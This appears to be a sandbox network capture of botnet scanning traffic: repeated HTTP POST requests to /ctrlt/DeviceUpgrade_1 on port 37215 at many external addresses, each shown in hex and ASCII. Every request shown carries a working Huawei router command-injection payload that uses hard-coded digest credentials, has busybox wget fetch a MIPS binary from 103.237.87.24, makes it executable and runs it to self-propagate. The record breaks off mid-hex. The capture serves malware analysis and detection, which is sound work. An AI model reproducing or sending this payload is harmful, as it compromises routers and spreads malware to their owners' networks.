                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  975192.168.2.1336272187.151.69.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404303074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  976192.168.2.134897441.138.98.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404319048 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  977192.168.2.1354016194.131.182.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404323101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  978192.168.2.1342306197.69.61.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404378891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  979192.168.2.134508054.123.55.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404398918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  980192.168.2.133336841.197.225.2837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404421091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  981192.168.2.1346162197.197.96.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404429913 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  982192.168.2.1344722197.128.12.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404437065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  983192.168.2.1356450204.14.233.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.404464006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  984192.168.2.1335356197.179.143.14937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.406354904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 